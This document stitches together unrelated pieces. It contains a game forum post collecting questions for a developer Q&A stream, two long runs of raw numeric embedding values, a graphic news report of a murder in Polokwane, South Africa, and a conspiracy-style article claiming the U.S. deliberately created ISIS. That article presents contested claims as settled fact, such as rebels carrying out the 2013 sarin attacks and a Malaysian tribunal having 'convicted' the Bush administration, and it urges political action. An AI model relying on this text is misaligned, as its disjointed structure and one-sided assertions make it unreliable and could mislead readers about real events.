Q&A Stream #12 - Submit your questions here BUGS DO NOT GO HERE Juke spots Stream is tomorrow @2pm EDT http://twitch.tv/deadbydaylight Please no bug reports, or bug related questions -- bug reports can be posted at the bug report sub forum.This will be one of the first things Devs will discuss----------Hello everyone!The time is upon us once again. They Devs want this to be a great game for everyone and they appreciate the time you take out of your gaming to report the issues and give your thoughts as to how the game can be better.The weekly Q&A Stream has continued to increase in popularity. In order for the Devs to be able to answer as many questions as possible we are going to have this thread where you can ask your questions before hand. It will be locked at 11:30 EST on Thursday so the Devs have time to compile them all.In order to keep things as streamlined as possible, only posts with questions will be allowed in the thread, all other posts will be removed. Any duplicate questions and troll posts will also be removed. Ex: “What don’t you fix your frakkin game?’ The Devs want to be as open as they can be in regards to the game and the things they are working on and the issues at hand. Try to make your questions succinct and understandable.Thanks and see you at the stream tomorrow @2pm EDT
[ -0.10726869106292725, 0.0004509737773332745, 0.046226851642131805, -0.051123227924108505, 0.036458682268857956, 0.029197579249739647, 0.027373244985938072, -0.016902992501854897, -0.06841467320919037, 0.07236643135547638, -0.09283648431301117, -0.04470477253198624, 0.00815177895128727, -0.01811249926686287, 0.005515495780855417, 0.022111617028713226, 0.00512987095862627, -0.06816641241312027, -0.09410256892442703, -0.026933958753943443, -0.03404133766889572, -0.03566526621580124, 0.0067237792536616325, 0.029877344146370888, -0.012618890963494778, -0.04687628149986267, -0.01540855411440134, 0.036007631570100784, -0.030535519123077393, -0.08374239504337311, -0.06609530746936798, -0.012439358048141003, -0.03142861649394035, -0.038875967264175415, 0.024048713967204094, 0.0020357323810458183, 0.02879641018807888, -0.06152087077498436, -0.05794312804937363, -0.043562956154346466, -0.004312742967158556, -0.03950367495417595, -0.03517945110797882, 0.01028301939368248, -0.031098196282982826, -0.014788109809160233, -0.0025045580696314573, -0.022912830114364624, 0.003254741197451949, -0.006128360517323017, -0.06856086850166321, -0.054247934371232986, 0.034038372337818146, 0.055654238909482956, 0.0671222060918808, 0.007237082812935114, -0.012723746709525585, -0.021076161414384842, 0.054557789117097855, 0.02648196928203106, 0.02994629368185997, 0.013498837128281593, -0.021452385932207108, 0.04480389505624771, 0.019800100475549698, -0.059066303074359894, 0.03535962849855423, 0.054233748465776443, -0.010147127322852612, 0.01934918947517872, -0.0927409753203392, 0.07562436908483505, -0.02539912424981594, 0.03170662745833397, 0.014882611110806465, 0.006626107729971409, -0.10933588445186615, -0.012310764752328396, 0.0008324711816385388, 0.054374810308218, 0.02613150142133236, -0.03724254295229912, -0.006356646306812763, -0.008028466254472733, 0.06118502840399742, 0.022661035880446434, 0.04298294335603714, 0.10712815076112747, 0.014117687940597534, 0.002172383014112711, -0.034335192292928696, 0.07943032681941986, 0.15186159312725067, 0.040567200630903244, 0.025760682299733162, 0.03187834098935127, 0.06462018936872482, -0.010605833493173122, -0.030760569497942924, 0.10980089008808136, 0.05709437280893326, 0.027295507490634918, 0.032280128449201584, -0.0017022364772856236, 0.021149827167391777, 0.03232821077108383, -0.057002417743206024, 0.07990965247154236, 0.005654191132634878, -0.08517388999462128, -0.03977712616324425, -0.010014929808676243, -0.030279168859124184, -0.044956836849451065, 0.02447802573442459, -0.01597079262137413, 0.016775915399193764, 0.07909740507602692, 0.008872777223587036, 0.04146454110741615, 0.0726642906665802, 0.04448423162102699, -0.07058319449424744, -0.01393528189510107, 0.1984405815601349, 0.053205836564302444, -0.0972960963845253, 5.808292809539592e-33, 0.10905904322862625, 0.009646582417190075, -0.0022743765730410814, 0.03575267642736435, 0.06992193311452866, -0.03848688304424286, 0.03121420554816723, 0.06255393475294113, 0.0020917770452797413, -0.08137635886669159, 0.041234806180000305, -0.04785521700978279, -0.03791126608848572, -0.025512682273983955, 0.007925224490463734, -0.06032876670360565, 0.047734394669532776, -0.033134885132312775, -0.06967122852802277, 0.006945144385099411, 0.06525494158267975, -0.11072888225317001, -0.036027099937200546, 0.004575959872454405, 0.02456333115696907, 0.04736463353037834, -0.041073527187108994, -0.008812004700303078, 0.03430309146642685, 0.0624847374856472, -0.09414484351873398, -0.054167039692401886, -0.012072764337062836, 0.04580659791827202, -0.020468533039093018, -0.04054699465632439, -0.037450652569532394, -0.06587523967027664, -0.07295124232769012, -0.0775086060166359, -0.013475455343723297, 0.024046670645475388, -0.12399619817733765, -0.012141609564423561, 0.0357266366481781, -0.02236427366733551, -0.004918019287288189, -0.02834862284362316, -0.018885213881731033, -0.03442338854074478, -0.009132562205195427, 0.052578311413526535, 0.034861959517002106, 0.01170371100306511, 0.04579317197203636, -0.02670489437878132, -0.03098348341882229, -0.11633589118719101, -0.06093890964984894, 0.1166936606168747, 0.014900642447173595, -0.01568412408232689, -0.009085915051400661, -0.04460947960615158, -0.0010821633040904999, 0.007786394562572241, 0.07805124670267105, 0.053033605217933655, 0.07415696978569031, -0.05905689671635628, 0.012605923227965832, 0.020223036408424377, -0.026261979714035988, 0.014659901149570942, -0.0023434727918356657, 0.06008506938815117, -0.0094468854367733, -0.05121428892016411, -0.017717836424708366, -0.006859147921204567, 0.045905210077762604, -0.02023344859480858, -0.03250720724463463, -0.04185561463236809, 0.027447286993265152, -0.08060210943222046, 0.09797797352075577, 0.0010591523023322225, 0.013981417752802372, 0.002091985661536455, -0.07456018030643463, 0.04141243174672127, 0.09684723615646362, -0.047167252749204636, -0.0033167945221066475, -4.853068467646139e-33, -0.0494508258998394, -0.00767163373529911, -0.1739073544740677, 0.017734818160533905, -0.03437428921461105, -0.040690720081329346, 0.029126988723874092, 0.06584803760051727, 0.09806229919195175, -0.03835434466600418, -0.0990077555179596, 0.019689781591296196, -0.05945044010877609, -0.0003010966465808451, -0.06495572626590729, -0.07466001808643341, 0.06985268741846085, -0.04465395584702492, 0.018383096903562546, 0.06305333971977234, -0.046486351639032364, 0.06644294410943985, -0.055358581244945526, -0.01784084364771843, -0.013876013457775116, 0.05685766041278839, 0.057383760809898376, 0.0324859656393528, -0.014641037210822105, 0.07527485489845276, 0.0697447806596756, -0.0017058115918189287, -0.03115250915288925, -0.004026689566671848, 0.056320611387491226, -0.03950698301196098, 0.07112289220094681, -0.010025872848927975, 0.016403844580054283, 0.05558919906616211, 0.10305367410182953, 0.0019593320321291685, -0.03194344416260719, -0.022684719413518906, -0.015315559692680836, 0.0491509735584259, -0.005858675576746464, -0.004044548142701387, -0.0313115231692791, 0.036233387887477875, 0.01871361769735813, -0.0682821050286293, 0.0026887415442615747, 0.0034315846860408783, -0.024899231269955635, -0.034497734159231186, -0.030444368720054626, 0.04488064721226692, 0.02480159141123295, 0.04640576243400574, 0.0028063913341611624, 0.01259960699826479, -0.06274547427892685, -0.001209523412398994, 0.15135157108306885, -0.009072034619748592, 0.040264759212732315, 0.03910699486732483, 0.011881092563271523, -0.06817735731601715, -0.07022035866975784, -0.04537929221987724, -0.04668961465358734, -0.03066219575703144, 0.017421027645468712, 0.06332048028707504, 0.016835099086165428, -0.03650572523474693, -0.009697378613054752, 0.04506338760256767, -0.009307482279837132, 0.034205444157123566, -0.03918007016181946, 0.03439519554376602, -0.014428782276809216, -0.0008882449474185705, 0.10972864180803299, 0.09723082929849625, 0.04601065069437027, -0.025215977802872658, 0.0276193730533123, 0.05512860417366028, -0.04065019637346268, 0.11128795146942139, 0.06105151027441025, -6.203874391985664e-8, 0.061380453407764435, 0.035551782697439194, -0.10301559418439865, 0.037762757390737534, 0.05803145468235016, 0.0184243805706501, -0.04738406091928482, -0.01828901655972004, 0.03573153540492058, 0.03171100839972496, 0.01754355989396572, -0.02451292797923088, 0.06091530993580818, 0.015922443941235542, 0.08023726940155029, -0.0006432301015593112, -0.10390757024288177, 0.02553172968327999, -0.09229154884815216, -0.15472540259361267, -0.0004105857224203646, 0.05756988748908043, 0.0432654432952404, -0.014811668545007706, -0.05892075225710869, 0.0007399803143925965, 0.020965900272130966, 0.02544386312365532, 0.009908913634717464, 0.041313398629426956, -0.0028398626018315554, 0.014376365579664707, -0.00013490924902725965, -0.01448374055325985, -0.07056595385074615, -0.05259358882904053, -0.007292667869478464, -0.0013378086732700467, 0.03547289967536926, -0.0029927396681159735, -0.03247318044304848, 0.004309773910790682, 0.029240097850561142, -0.011054236441850662, -0.08139670640230179, -0.03367040678858757, -0.06798160821199417, -0.025077059864997864, -0.06528662145137787, -0.08412549644708633, -0.07265795767307281, -0.022310307249426842, 0.06377360224723816, 0.053567126393318176, 0.11978485435247421, 0.019978828728199005, 0.02253636345267296, 0.00040592040750198066, -0.014851843938231468, -0.027068449184298515, 0.09812149405479431, 0.01830587163567543, -0.01961762271821499, 0.0377018116414547 ]
A South African mother of three was stabbed 21 times and had her eyes gouged out in a home invasion robbery that police said was the grisliest crime they’d ever seen, according to published reports. The nude body of Tanya Wiers, 45, was discovered inside her daughter’s bedroom in Polokwane, about 150 miles north of Pretoria, after her teenage son, Rolf, had returned home from school Feb. 9, the Bosveld Review reported. She had suffered stab wounds to her neck and under her chin and her eyes had been cut out with a knife, the newspaper said. She also had numerous defensive wounds. “I went into the house, thinking she might have died from a heart attack. What I saw was like something out of a horror movie,” a family friend later told Bosveld Review. “She was lying in her youngest daughter’s room covered by a duvet beside the bed. It was clear that there had been a struggle as the bed was not where it used to be in the room,” said the friend, who requested anonymity. “Tanya’s clothing was lying in front of the closet in her and her husband’s room. The closet doors were still open and it is evident someone had searched through,” the friend said. One of the suspects, Frans Maela, 25, was arrested later that day and charged with her murder after police found Wiers’ stolen property in his possession. It was unclear what he had taken. More arrests were expected in the coming days. “This is the most gruesome thing I’ve ever seen. I can’t think that there will ever be anything worse. It was evident that the victim put up the fight of her life, there was so much blood and her defensive wounds tell their own horrifying story,” a police spokesperson, Brig. Motlafela Mojapelo, told Bosveld Review. A memorial service for Wiers will be held on Tuesday at AFM Terberna Dei Mother Campus Polokwane.
[ -0.06666683405637741, 0.05997105687856674, -0.04491542652249336, 0.05857257544994354, 0.04994542524218559, -0.011342369951307774, 0.016836494207382202, 0.02981623262166977, 0.0019130295841023326, 0.12354514002799988, 0.13899609446525574, -0.04901463910937309, 0.09296039491891861, -0.018250279128551483, 0.017005370929837227, -0.028774471953511238, 0.07805085182189941, -0.0692887157201767, -0.08508867025375366, 0.07211072742938995, -0.046330079436302185, 0.007075848523527384, 0.18535423278808594, -0.01987903006374836, 0.03574932739138603, 0.005097327288240194, 0.05583679676055908, -0.04410671442747116, -0.05342743173241615, 0.010175205767154694, -0.0514238066971302, -0.04958976432681084, -0.11326911300420761, 0.025531301274895668, 0.011861689388751984, 0.010467187501490116, 0.06330191344022751, 0.02694096788764, 0.009091167710721493, 0.007600944954901934, -0.048749104142189026, -0.03626687824726105, -0.061312343925237656, -0.06024467945098877, -0.0025001277681440115, -0.03506333380937576, 0.013016426004469395, 0.017042234539985657, -0.02041306532919407, -0.08256364613771439, -0.03618592023849487, 0.014308171346783638, -0.1026102751493454, 0.013533360324800014, -0.04280945286154747, -0.07723171263933182, -0.005128141492605209, 0.039856091141700745, 0.038146138191223145, -0.008638511411845684, 0.07062122970819473, 0.030974172055721283, 0.055073197931051254, 0.019196726381778717, 0.04588932916522026, -0.08123643696308136, 0.01856384426355362, -0.026835419237613678, 0.08114635944366455, 0.06837892532348633, 0.0834571048617363, -0.02233944833278656, -0.05235189571976662, 0.012190700508654118, -0.07091986387968063, -0.008168107829988003, 0.0893363207578659, -0.06256746500730515, -0.03341573476791382, 0.03293297812342644, -0.03737768903374672, -0.045722492039203644, 0.13222433626651764, 0.033466409891843796, -0.018651451915502548, -0.041216909885406494, 0.011687797494232655, -0.04396939277648926, -0.024698035791516304, -0.028735889121890068, -0.026135673746466637, -0.046379391103982925, 0.018077386543154716, 0.04334425553679466, 0.024647772312164307, -0.028262225911021233, -0.07994463294744492, 0.07877428084611893, -0.05911644920706749, 0.014349018223583698, -0.06464342027902603, -0.028322529047727585, 0.06527388840913773, 0.013253659009933472, 0.0117161450907588, -0.03718153387308121, 0.039137937128543854, -0.011865600012242794, -0.03158433735370636, -0.02287369780242443, -0.028103651478886604, 0.03616591542959213, 0.003338086884468794, 0.007856489159166813, 0.03732442855834961, -0.02792949043214321, 0.06310591101646423, -0.02930593118071556, -0.02126588299870491, -0.006744705606251955, 0.06489229202270508, -0.008203350938856602, 0.003778051817789674, -0.013693124055862427, 0.018069405108690262, -0.045910242944955826, 0.03445225954055786, 4.970731411401619e-33, 0.019114619120955467, 0.00317161506973207, 0.03117879293859005, -0.003119395114481449, 0.0761369988322258, 0.02707040123641491, -0.0282326340675354, 0.02296404354274273, -0.012328495271503925, 0.08285881578922272, -0.04415370523929596, -0.10005512088537216, 0.03574934974312782, -0.08151966333389282, -0.02792729251086712, 0.1394609808921814, -0.040548041462898254, 0.06442531198263168, -0.00741951260715723, 0.044350866228342056, 0.049742985516786575, 0.08583848178386688, 0.013263854198157787, -0.01178286038339138, -0.023488786071538925, 0.011488397605717182, 0.04950496554374695, -0.03261129558086395, -0.043559953570365906, -0.0006858441629447043, 0.006481328047811985, 0.0075824386440217495, 0.06045454367995262, -0.09106834977865219, 0.020670169964432716, 0.013836950995028019, 0.05139162018895149, -0.03520650789141655, -0.08321507275104523, -0.03838535025715828, 0.00024235610908363014, -0.033503208309412, 0.00045279107871465385, 0.06059416010975838, -0.02704087272286415, 0.05353596433997154, -0.07745195180177689, -0.03732697665691376, -0.05371183529496193, 0.03217179328203201, 0.020755980163812637, 0.04391801357269287, 0.006790568586438894, 0.07054298371076584, -0.023463377729058266, 0.12052994221448898, 0.00705305440351367, -0.05028147250413895, 0.09351565688848495, 0.061883263289928436, 0.11210381239652634, -0.02348993346095085, 0.0013986547710373998, -0.017846450209617615, -0.034172531217336655, -0.14953185617923737, 0.059262022376060486, -0.055896539241075516, -0.00787233468145132, -0.08046397566795349, -0.1116907075047493, 0.052782196551561356, 0.013187973760068417, -0.01469136867672205, -0.013554660603404045, 0.0074995774775743484, 0.013197881169617176, -0.00612459285184741, -0.043341487646102905, -0.06053198128938675, 0.04599505662918091, 0.01613840088248253, 0.04528113454580307, -0.02859203703701496, -0.04045376554131508, -0.05140015482902527, -0.07861439883708954, -0.12168146669864655, -0.06249118968844414, 0.015059937722980976, -0.024481216445565224, 0.011875195428729057, -0.02562885545194149, -0.10612796992063522, -0.0658847987651825, -6.22115030277738e-33, 0.006238618399947882, -0.013987538404762745, -0.048019975423812866, 0.027859242632985115, 0.04277053475379944, -0.0957556813955307, -0.06711640954017639, 0.07871113717556, -0.003995416220277548, -0.05857399106025696, 0.05247073993086815, -0.10628186166286469, 0.03831109032034874, 0.06089695915579796, -0.002536623040214181, -0.010839366354048252, 0.052790526300668716, -0.014465424232184887, -0.040951792150735855, -0.0460612028837204, -0.04328429326415062, 0.000702527875546366, 0.020718296989798546, -0.044714607298374176, 0.00565178319811821, 0.06509622186422348, 0.05060814693570137, 0.004998907446861267, -0.08805499225854874, 0.05566735938191414, 0.014559101313352585, 0.038930486887693405, 0.08298442512750626, 0.08097060024738312, -0.0813198983669281, 0.028819290921092033, 0.028018072247505188, -0.06276885420084, -0.059794582426548004, -0.05652408301830292, 0.10631966590881348, 0.006941791623830795, -0.047745004296302795, 0.07974068820476532, -0.04826323315501213, -0.02652965858578682, 0.011431124992668629, 0.05373629927635193, 0.025928381830453873, -0.011616842821240425, 0.01811119168996811, -0.0012080225860700011, 0.01672762632369995, 0.02913045883178711, 0.08134403824806213, -0.014210269786417484, -0.02261495776474476, -0.07403197884559631, 0.02882322296500206, 0.04453239217400551, 0.039018385112285614, 0.05570016801357269, -0.08012216538190842, 0.023414313793182373, 0.06593585759401321, 0.04008106514811516, -0.05228490009903908, -0.04170362651348114, -0.05719728022813797, -0.0024262312799692154, 0.023054061457514763, -0.025534024462103844, -0.05833583325147629, 0.04027820751070976, 0.08560105413198471, 0.04635750129818916, -0.04468151926994324, 0.03967266529798508, -0.04512226581573486, 0.02036347985267639, -0.0293465256690979, -0.1206069141626358, 0.03065888024866581, -0.004770970903337002, 0.046375617384910583, -0.013840112835168839, 0.008933891542255878, -0.010710924863815308, -0.014156230725347996, -0.0785568505525589, -0.06832252442836761, -0.08293386548757553, 0.046147171407938004, -0.0032342090271413326, 0.019086794927716255, -6.073533143080567e-8, -0.025438455864787102, 0.05363676697015762, -0.021667305380105972, -0.009662649594247341, -0.005859958939254284, 0.042804133147001266, -0.02831443026661873, -0.008204752579331398, -0.026322228834033012, 0.08111070841550827, -0.09640347957611084, 0.0889817401766777, -0.004866474308073521, -0.005191869102418423, -0.005849805660545826, -0.049409784376621246, 0.03778549283742905, -0.03821520134806633, -0.022000806406140327, -0.04049108549952507, 0.025173963978886604, 0.03829420357942581, 0.06318145990371704, -0.012887310236692429, 0.07285778969526291, 0.04213135689496994, -0.08393537253141403, 0.028260646387934685, -0.04010636359453201, 0.05285021662712097, 0.0015815608203411102, -0.0020205634646117687, 0.021114978939294815, 0.062472473829984665, -0.06330619007349014, -0.07904686778783798, 0.04714816063642502, 0.05259273201227188, -0.0402914322912693, 0.0010088876588270068, -0.02997240051627159, -0.09796522557735443, 0.04242746904492378, 0.002245016163215041, 0.030402930453419685, -0.02758997678756714, 0.05011714622378349, -0.06930569559335709, 0.020864441990852356, -0.015222481451928616, -0.00668063759803772, -0.04451806843280792, -0.04445227235555649, 0.04795705899596214, -0.027755646035075188, -0.0627257227897644, 0.03055664896965027, 0.0405658483505249, -0.05276843532919884, 0.04934732988476753, 0.01782592199742794, -0.05503351613879204, -0.006466010585427284, -0.0026906186249107122 ]
The Covert Origins Of ISIS Above: A file image uploaded on June 14, 2014 on the jihadist website Welayat Salahuddin allegedly shows militants of the Islamic State of Iraq and the Levant (ISIL) executing dozens of captured Iraqi security forces members at an unknown location in the Salaheddin province (AFP Photo / HO) Evidence exposing who put ISIS in power, and how it was done. The Islamic militant group ISIS, formerly known as Al-Qaeda in Iraq, and recently rebranded as the so called Islamic State, is the stuff of nightmares. They are ruthless, fanatical, killers, on a mission, and that mission is to wipe out anyone and everyone, from any religion or belief system and to impose Shari’ah law. The mass executions, beheadings and even crucifixions that they are committing as they work towards this goal are flaunted like badges of pride, video taped and uploaded for the whole world to see. This is the new face of evil. Would it interest you to know who helped these psychopaths rise to power? Would it interest you to know who armed them, funded them and trained them? Would it interest you to know why? This story makes more sense if we start in the middle, so we’ll begin with the overthrow of Muammar Gaddafi in 2011. The Libyan revolution was Obama’s first major foreign intervention. It was portrayed as an extension of the Arab Spring, and NATO involvement was framed in humanitarian terms. The fact that the CIA was actively working to help the Libyan rebels topple Gaddafi was no secret, nor were the airstrikes that Obama ordered against the Libyan government.However, little was said about the identity or the ideological leanings of these Libyan rebels. Not surprising, considering the fact that the leader of the Libyan rebels later admitted that his fighters included Al-Qaeda linked jihadists who fought against allied troops in Iraq. These jihadist militants from Iraq were part of what national security analysts commonly referred to as Al-Qaeda in Iraq. Remember Al-Qaeda in Iraq was ISIS before it was rebranded. With the assistance of U.S. and NATO intelligence and air support, the Libyan rebels captured Gaddafi and summarily executed him in the street, all the while enthusiastically chanting “Allah Akbar”. For many of those who had bought the official line about how these rebels were freedom fighters aiming to establish a liberal democracy in Libya, this was the beginning of the end of their illusions. Prior to the U.S. and NATO backed intervention, Libya had the highest standard of living of any country in Africa. This according to the U.N.’s Human Development Index rankings for 2010.However in the years following the coup, the country descended into chaos, with extremism and violence running rampant. Libya is now widely regarded as failed state (of course those who were naive enough to buy into the propaganda leading up to the war get defensive when this is said). Now after Gaddafi was overthrown, the Libyan armories were looted, and massive quantities of weapons were sent by the Libyan rebels to Syria. The weapons, which included anti-tank and anti-aircraft missiles were smuggled into Syria through Turkey, a NATO ally. The times of Londonreported on the arrival of the shipment on September 14th, 2012. (Secondary confirmation in this NYT article) This was just three days after Ambassador Chris Stevens was killed by the attack on the U.S. embassy in Benghazi. Chris Stevens had served as the U.S. government’s liaison to the Libyan rebels since April of 2011. While a great deal media attention has focused on the fact that the State Department did not provide adequate security at the consulate, and was slow to send assistance when the attack started, Pulitzer Prize winning journalist Seymour Hersh released an article in April of 2014 which exposed a classified agreement between the CIA, Turkey and the Syrian rebels to create what was referred to as a “rat line”. The “rat line” was covert network used to channel weapons and ammunition from Libya, through southern turkey and across the Syrian border. Funding was provided by Turkey, Saudi Arabia and Qatar. With Stevens dead any direct U.S. involvement in that arms shipment was buried, and Washington would continue to claim that they had not sent heavy weaponry into Syria. It was at this time that jihadist fighters from Libya began flooding into Syria as well. And not just low level militants. Many were experienced commanders who had fought in multiple theaters. The U.S. and its allies were now fully focused on taking down Assad’s government in Syria. As in Libya this regime change was to be framed in terms of human rights, and now overt support began to supplement the backdoor channels. The growing jihadist presence was swept under the rug and covered up. However as the rebels gained strength, the reports of war crimes and atrocities that they were committing began to create a bit of a public relations problem for Washington. It then became standard policy to insist that U.S. support was only being given to what they referred to as“moderate” rebel forces. This distinction, however, had no basis in reality. In an interview given in April of 2014, FSA commander Jamal Maarouf admitted that his fighters regularly conduct joint operations with Al-Nusra. Al-Nusra is the official Al-Qa’ida branch in Syria. This statement is further validated by an interview given in June of 2013 by Colonel Abdel Basset Al-Tawil, commander of the FSA’s Northern Front. In this interview he openly discusses his ties with Al-Nusra, and expresses his desire to see Syria ruled by sharia law. (You can verify the identities of these two commanders here in this document from The Institute for the Study of War) Moderate rebels? Well it’s complicated. Not that this should really come as any surprise. Reuters had reported in 2012 that the FSA’s command was dominated by Islamic extremists, and the New York Times had reported that same year that the majority of the weapons that Washington were sending into Syria was ending up in the hands Jihadists. For two years the U.S. government knew that this was happening, but they kept doing it. And the FSA’s ties to Al-Nusra are just the beginning. In June of 2014 Al-Nusra merged with ISIS at the border between Iraq and Syria. So to review, the FSA is working with Al-Nusra, Al-Nusra is working with ISIS, and the U.S. has been sending money and weapons to the FSA even though they’ve known since 2012 that most of these weapons were ending up in the hands of extremists. You do the math. In that context, the sarin gas attacks of 2013 which turned out to have been committed by the Syrian rebels, makes a lot more sense doesn’t it? If it wasn’t enough that U.N. investigators, Russian investigators, and Pulitzer prize winning journalist Seymour Hersh all pinned that crime on Washington’s proxies, the rebels themselves threatened the West that they would expose what really happened if they were not given more advanced weaponry within one month. By the way, this also explains why Washington then decided to target Russia next. This threat was made on June 10th, 2013. In what can only be described as an amazing coincidence, just nine days later, the rebels received their first official shipment of heavy weapons in Aleppo. After the second sarin gas fiasco, which was also exposed and therefore failed to garner public support for airstrikes, the U.S. continued to increase its the training and support for the rebels. In February of 2014, Haaretz reported that the U.S. and its allies in the region, Saudi Arabia, Jordan and Israel, were in the process of helping the Syrian rebels plan and prepare for a massive attack in the south. According to Haaretz Israel had also provided direct assistance in military operations against Assad four months prior (you can access a free cached version of the page here). Then in May of 2014 PBS ran a report in which they interviewed rebels who were trained by the U.S. in Qatar. According to those rebels they were being trained to finish off soldiers who survived attacks. “They trained us to ambush regime or enemy vehicles and cut off the road,” said the fighter, who is identified only as “Hussein.” “They also trained us on how to attack a vehicle, raid it, retrieve information or weapons and munitions, and how to finish off soldiers still alive after an ambush.” This is a blatant violation of the Geneva conventions. It also runs contrary to conventional military strategy. In conventional military strategy soldiers are better off left wounded, because this ends up costing the enemy more resources. Executing captured enemy soldiers is the kind of tactic used when you want to strike terror in the hearts of the enemy. It also just happens to be standard operating procedure for ISIS. One month after this report, in June of 2014, ISIS made its dramatic entry, crossing over the Syrian border into Iraq, capturing Mosul, Baiji and almost reaching Baghdad. The internet was suddenly flooded with footage of drive by shootings, large scale death marches, and mass graves. And of course any Iraqi soldier that was captured was executed. Massive quantities of American military equipment were seized during that operation. ISIS took entire truckloads of humvees, they took helicopters, tanks, and artillery. They photographed and video taped themselves and advertised what they were doing on social media, and yet for some reason Washington didn’t even TRY to stop them. U.S. military doctrine clearly calls for the destruction of military equipment and supplies when friendly forces cannot prevent them from falling into enemy hands, but that didn’t happen here. ISIS was allowed to carry this equipment out of Iraq and into Syria unimpeded. The U.S. military had the means to strike these convoys, but they didn’t lift a finger, even though they had been launching drone strikes in Pakistan that same week. Why would they do that? Though Obama plays the role of a weak, indecisive, liberal president, and while pundits from the right have had a lot of fun with that image, this is just a facade. Some presidents, like George W. Bush, rely primarily on overt military aggression. Obama gets the same job done, but he prefers covert means. Not really surprising considering the fact that Zbigniew Brzezinski was his mentor. Those who know their history will remember that Zbigniew Brzezinski was directly involved in the funding and arming the Islamic extremists in Pakistan and Afghanistan in order to weaken the Soviets. By the way Osama bin Laden was one of these anti-Soviet “freedom fighters” the U.S. was funding and arming. This operation is no secret at this point, nor are the unintended side effects. Officially the U.S. government’s arming and funding of the Mujahideen was a response to the Soviet invasion in December of 1979, however in his memoir entitled “From the Shadows” Robert Gates, director of the CIA under Ronald Reagan and George Bush Senior, and Secretary of Defense under both George W. Bush and Barack Obama, revealed that the U.S. actually began the covert operation 6 months prior, with the express intention of luring the Soviets into a quagmire. (You can preview the relevant text here on google books) The strategy worked. The Soviets invaded, and the ten years of war that followed are considered by many historians as being one of the primary causes of the fall of the USSR. This example doesn’t just establish precedent, what we’re seeing happen in Iraq, Afghanistan and Syria right now is actually a continuation of a old story. Al-Nusra and ISIS are ideological and organizational decedents of these extremist elements that the U.S. government made use of thirty years ago. The U.S. the went on to create a breeding ground for these extremists by invading Iraq in 2003. Had it not been for the vacuum of power left by the removal and execution of Saddam, Al-Qaeda in Iraq, aka ISIS, would not exist. And had it not been for Washington’s attempt at toppling Assad by arming, funding and training shadowy militant groups in Syria, there is no way that ISIS would have been capable of storming into Iraq in June of 2014. On every level, no matter how you cut it, ISIS is a product of U.S. government’s twisted and decrepit foreign policy. Now all of this may seem contradictory to you as you watch the drums of war against ISIS begin to beat louder and the air strikes against them are gradually widenedhttp://www.wjla.com/articles/2014/08/president-obama-considers-possible-…). Why would the U.S. help a terrorist organization get established, only to attack them later? Well why did the CIA put Saddam Hussein in power in 1963?, Why did the U.S. government back Saddam in 1980 when he launched a war of aggression against Iran, even though they knew that he was using chemical weapons? Why did the U.S. fund and arm Islamic extremists in Afghanistan against the Soviets? There’s a pattern here if you look closely. This is a tried and true geopolitical strategy. Step 1: Build up a dictator or extremist group which can then be used to wage proxy wars against opponents. During this stage any crimes committed by these proxies are swept under the rug. [Problem] Step 2: When these nasty characters have outlived their usefulness, that’s when it’s time to pull out all that dirt from under the rug and start publicizing it 24/7. This obviously works best when the public has no idea how these bad guys came to power.[Reaction] Step 3: Finally, when the public practically begging for the government to do something, a solution is proposed. Usually the solution involves military intervention, the loss of certain liberties, or both. [Solution] ISIS is extremely useful. They have essentially done Washington dirty work by weakening Assad. In 2014, while the news cycle has focused almost exclusively on Ukraine and Russia, ISIS made major headway in Syria, and as of August they already controlled 35% of the country. Since ISIS largely based in Syria, this gives the U.S. a pretext to move into Syria. Sooner or later the U.S. will extend the airstrikes into Assad’s backyard, and when they do U.S. officials are already making it clear that both ISIS and the Syrian government will be targeted. That, after all, is the whole point. Washington may allow ISIS to capture a bit more territory first, but the writing is on the wall, and has been for some time now. The Obama administration has repeatedly insisted that this will never lead to boots on the ground, however, the truth of the matter is that anyone who understands anything about military tactics knows full well that ISIS cannot be defeated by airstrikes alone. In response to airstrikes ISIS will merely disperse and conceal their forces. ISIS isn’t an established state power which can be destroyed by knocking out key government buildings and infrastructure. These are guerrilla fighters who cut their teeth in urban warfare. To significantly weaken them, the war will have to involve ground troops, but even this is a lost cause. U.S. troops could certainly route ISIS in street to street battles for some time, and they might even succeed in fully occupying Syria and Iraq for a number of years, but eventually they will have to leave, and when they do, it should be obvious what will come next. The puppets that the U.S. government has installed in the various countries that they have brought down in recent years have without exception proven to be utterly incompetent and corrupt. No one that Washington places in power will be capable of maintaining stability in Syria. Period. Right now, Assad is the last bastion of stability in the region. He is the last chance they have for a moderate non-sectarian government and he is the only hope of anything even remotely resembling democracy for the foreseeable future. If Assad falls, Islamic extremist will take the helm, they will impose shari’ah law, and they will do everything in their power to continue spreading their ideology as far and wide as they can. If the world truly wants to stop ISIS, there is only one way to do it: 1. First and foremost, the U.S. government and its allies must be heavily pressured to cut all support to the rebels who are attempting to topple Assad. Even if these rebels that the U.S. is arming and funding were moderate, and they’re not, the fact that they are forcing Assad to fight a war on multiple fronts, only strengthens ISIS. This is lunacy. 2. The Syrian government should be provided with financial support, equipment, training and intelligence to enable them to turn the tide against ISIS. This is their territory, they should be the ones to reclaim it. Now obviously this support isn’t going to come from the U.S. or any NATO country, but there are a number of nations who have a strategic interest in preventing another regime change and chaotic aftermath. If these countries respond promptly, as in right now, they could preempt a U.S. intervention, and as long this support does not include the presence of foreign troops, doing so will greatly reduce the likelihood of a major confrontation down the road. 3. The U.S. government and its allies should should be aggressively condemned for their failed regime change policies and the individuals behind these decisions should be charged for war crimes. This would have to be done on an nation by nation level since the U.N. has done nothing but enable NATO aggression. While this may not immediately result in these criminals being arrested, it would send a message. This can be done. Malaysia has already proven this by convicting the Bush administration of war crimes in abstentia. Now you might be thinking: “This all sounds fine and good, but what does this have to do with me? I can’t influence this situation.” That perspective is quite common, and for most people, it’s paralyzing, but the truth of the matter is that we can influence this. We’ve done it before, and we can do it again. I’ll be honest with you though, this isn’t going to be easy. To succeed we have to start thinking strategically. Like it or not, this is a chess game. If we really want to rock the boat, we have to start reaching out to people in positions of influence. This can mean talking to broadcasters at your local radio station, news paper, or t.v. station, or it can mean contacting influential bloggers, celebrities, business figures or government officials. Reaching out to current serving military and young people who may be considering joining up is also important. But even if it’s just your neighbor, or your coworker, every single person we can reach brings us closer to critical mass. The most important step is to start trying. If you are confused about why this is all happening, watch this video we put out on September 11th, 2012 If this message resonates with you then spread it. If you want to see the BIG picture, and trust me we’ve got some very interesting reports coming, subscribe to StormCloudsGathering on Youtube, and follow us on Facebook, twitter and Google plus. BONUS ARTICLE (an interesting tangent): Were the Libyan rebels being led by a CIA plant?
